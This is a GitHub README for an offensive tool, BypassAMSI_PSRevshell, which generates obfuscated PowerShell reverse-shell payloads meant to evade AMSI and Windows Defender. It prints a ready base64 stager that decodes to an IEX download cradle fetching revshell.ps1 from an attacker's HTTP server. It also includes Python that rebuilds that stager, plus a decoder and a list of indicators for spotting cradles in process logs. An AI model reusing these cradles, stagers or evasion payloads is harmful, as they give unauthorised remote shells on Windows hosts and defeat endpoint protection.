gunzf0x/BypassAMSI_PSRevshell
GitHub: gunzf0x/BypassAMSI_PSRevshell
Obfuscated payload generator built on the Nishang reverse shell, intended to evade AMSI and Windows Defender and obtain remote access to a Windows host.
Stars: 14 | Forks: 1
# BypassAMSI PowerShell Revshell
## "Revshell" command
Generates an obfuscated `PowerShell` reverse shell payload based on the original [Nishang Reverse shell PS oneliner](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1).
### Usage
```
python3 BypassAMSI_PSRevshell.py revshell -i <ATTACKER_IP> -p <PORT>
```
For example:
```
❯ python3 BypassAMSI_PSRevshell.py revshell -i 10.10.10.10 -p 4444
```
generates the payload:
```
powershell -enc <encoded payload not shown>
```
## "Server" command
This option writes the obfuscated payload produced by the `revshell` command to a file (`revshell.ps1` by default) and exposes it through a temporary HTTP server (port `8000` by default, configurable with `--server-port`). The script then prints an encoded stager payload that requests that file from the temporary server, executes it, and so triggers the reverse shell.
### Usage
```
python3 BypassAMSI_PSRevshell.py server -i <ATTACKER_IP> -p <PORT> [--server-port <SERVER_PORT>]
```
For example:
```
❯ python3 BypassAMSI_PSRevshell.py server -i 10.10.10.10 -p 4444 --server-port 9000
```
generates the payload:
```
powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMAAuADEAMAA6ADkAMAAwADAALwByAGUAdgBzAGgAZQBsAGwALgBwAHMAMQAiACkA
```
Running it on the victim machine sends a request to the exposed HTTP server, fetches the payload file and executes it in memory. Note that the stager itself is not obfuscated: decoding the blob above gives the plain download cradle `IEX(New-Object Net.WebClient).downloadString("http://10.10.10.10:9000/revshell.ps1")`. `-enc` only hides the command from a glance at the process command line; AMSI scans the decoded script content, and PowerShell Script Block Logging (Event ID 4104) records it, so whatever evasion the tool provides comes from the obfuscated `revshell.ps1`, not from the stager. Defender signatures change, so verify the generated payloads against a current Defender build in a lab before relying on them.
## Help
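As an added example (not the tool's own code, which is not on this page), the following Python shows what the `-enc` wrapping used by both commands above actually is (UTF-16LE, then base64), rebuilds the server-mode stager so it can be checked against the README's own example blob, and decodes such a command line the way a defender would when it appears in Sysmon Event ID 1 or Security Event ID 4688. The cradle template in `build_stager` is an assumption recovered by decoding the page's example; the indicator list and the sample command lines are constructed for the demonstration.

```python
import base64
import re
from typing import List, Optional

# Server-mode payload exactly as printed in the README above, kept as a
# known-good reference so the functions below can be checked against it.
PAGE_EXAMPLE_BLOB = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAp"
    "AC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEA"
    "MAAuADEAMAAuADEAMAA6ADkAMAAwADAALwByAGUAdgBzAGgAZQBsAGwALgBwAHMAMQAiACkA"
)

# Constructed indicator list: substrings a detection rule would look for in a
# decoded script to spot a download cradle.
CRADLE_INDICATORS = ("IEX", "Net.WebClient", "downloadString")


def encode_for_enc(script: str) -> str:
    """Encode a command the way `powershell -enc` expects it:
    UTF-16LE bytes, then standard base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_enc_blob(blob: str) -> str:
    """Inverse of encode_for_enc. Trailing '=' padding is restored first,
    because blobs copied out of logs or tickets frequently lose it."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16le", errors="replace")


def build_stager(attacker_ip: str, server_port: int,
                 outfile: str = "revshell.ps1") -> str:
    """Plain download cradle that the README's server-mode example decodes to.
    ASSUMPTION: the template was recovered by decoding the page example; it is
    not the tool's code, and any other formatting the tool applies is unknown."""
    cradle = (f'IEX(New-Object Net.WebClient).downloadString('
              f'"http://{attacker_ip}:{server_port}/{outfile}")')
    return encode_for_enc(cradle)


# powershell.exe accepts -EncodedCommand, -e, -ec and any unambiguous prefix
# of "encodedcommand"; match the longest alias first so "-enc" is not cut short.
_ENC_ALIASES = ["ec"] + ["encodedcommand"[:i]
                          for i in range(1, len("encodedcommand") + 1)]
_ENC_FLAG = re.compile(
    r"-(?:" + "|".join(sorted(_ENC_ALIASES, key=len, reverse=True)) +
    r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def decode_enc_command(cmdline: str) -> Optional[str]:
    """Pull the blob out of a full `powershell ... -enc <b64>` command line
    (as logged by Sysmon Event 1 / Security 4688) and decode it.
    Returns None when the command line carries no encoded command."""
    m = _ENC_FLAG.search(cmdline)
    return decode_enc_blob(m.group(1)) if m else None


def cradle_indicators(decoded: str) -> List[str]:
    """Return the download-cradle indicators present in a decoded script,
    compared case-insensitively because PowerShell is case-insensitive."""
    low = decoded.lower()
    return [i for i in CRADLE_INDICATORS if i.lower() in low]


if __name__ == "__main__":
    # Constructed command line, as it would appear in a process-creation event.
    logged = "powershell -ExecutionPolicy Bypass -NoP -w hidden -e " + PAGE_EXAMPLE_BLOB
    script = decode_enc_command(logged)
    print(script)
    print(cradle_indicators(script))
    print("stager matches page example:",
          build_stager("10.10.10.10", 9000) == PAGE_EXAMPLE_BLOB)
```

Running the block prints the decoded cradle, the three indicators it contains, and `True` for the comparison with the page's blob. Because the regex requires whitespace right after the alias, `-ExecutionPolicy Bypass` is not mistaken for `-e` followed by a base64 blob, which is the usual false positive in quick `-e` decoders.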
```
❯ python3 BypassAMSI_PSRevshell.py revshell -h
usage: python3 BypassAMSI_PSRevshell.py revshell [-h] -i ATTACKER_IP -p PORT [-v] [--keep-pwd] [--enc-b64] [--no-banner]
Generate an obfuscated PowerShell payload to avoid Windows Defender
options:
-h, --help show this help message and exit
-i ATTACKER_IP, --attacker-ip ATTACKER_IP
Attacker IP address.
-p PORT, --port PORT Port to get revshell.
-v, --verbose Display payloads used and generated, along with some extra info.
--keep-pwd Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender.
--enc-b64 Encode in base64 the Attacker IP address and port provided to the payload.
--no-banner Do not print script banner.
Example: BypassAMSI_PSRevshell.py revshell -i 10.10.16.98 -p 4444
```
```
❯ python3 BypassAMSI_PSRevshell.py server -h
usage: python3 BypassAMSI_PSRevshell.py server [-h] -i ATTACKER_IP -p PORT [--server-port SERVER_PORT] [-o OUTFILE] [-v] [--keep-pwd] [--keep-file] [--enc-b64]
[--no-banner]
Generate an obfuscated PowerShell payload to avoid Windows Defender
options:
-h, --help show this help message and exit
-i ATTACKER_IP, --attacker-ip ATTACKER_IP
Attacker IP address serving temporal HTTP server.
-p PORT, --port PORT Listening port to get reverse shell.
--server-port SERVER_PORT
Port serving temporal HTTP server. Default: 8000.
-o OUTFILE, --outfile OUTFILE
Name of the temporal PowerShell file storing obfuscated payload. Default: revshell.ps1
-v, --verbose Display payloads used and generated, along with some extra info.
--keep-pwd Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender.
--keep-file This script will create a file named as "--outfile" flag and then is deleted. Use this flag if you want to keep the generated file/payload.
--enc-b64 Encode in base64 the Attacker IP address and port provided to the payload.
--no-banner Do not print script banner.
Example: BypassAMSI_PSRevshell.py server -i 10.10.16.98
```
## Disclaimer
Use this tool at your own risk. Be ethical (: